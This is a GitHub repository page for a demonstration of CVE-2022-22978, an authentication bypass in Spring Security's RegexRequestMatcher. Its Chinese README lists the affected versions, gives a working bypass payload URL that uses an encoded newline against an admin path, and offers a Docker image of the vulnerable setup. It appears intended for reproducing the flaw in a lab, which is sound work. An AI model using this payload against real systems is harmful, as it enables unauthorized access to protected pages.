Skip to content

DeEpinGh0st/CVE-2022-22978

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
.mvn/wrapper
.mvn/wrapper
 
 
src
src
 
 
.gitignore
.gitignore
 
 
Dockerfile
Dockerfile
 
 
README.md
README.md
 
 
img.png
img.png
 
 
img_1.png
img_1.png
 
 
mvnw
mvnw
 
 
mvnw.cmd
mvnw.cmd
 
 
pom.xml
pom.xml
 
 

Repository files navigation

CVE-2022-22978 Spring-Security bypass Demo

在Spring Security中使用RegexRequestMatcher且规则中包含带点号的正则表达式时,攻击者可以通过构造恶意数据包绕过身份认证

影响范围

Spring Security 5.5.x < 5.5.7
Spring Security 5.6.x < 5.6.4

复现

img.png img_1.png

Paylaod

http://localhost:8080/admin/index%0a

Docker

docker pull s0cke3t/cve-2022-22978:latest

About

CVE-2022-22978 Spring-Security bypass Demo

Resources

Readme
Activity

Stars

12 stars

Watchers

4 watching

Forks

4 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages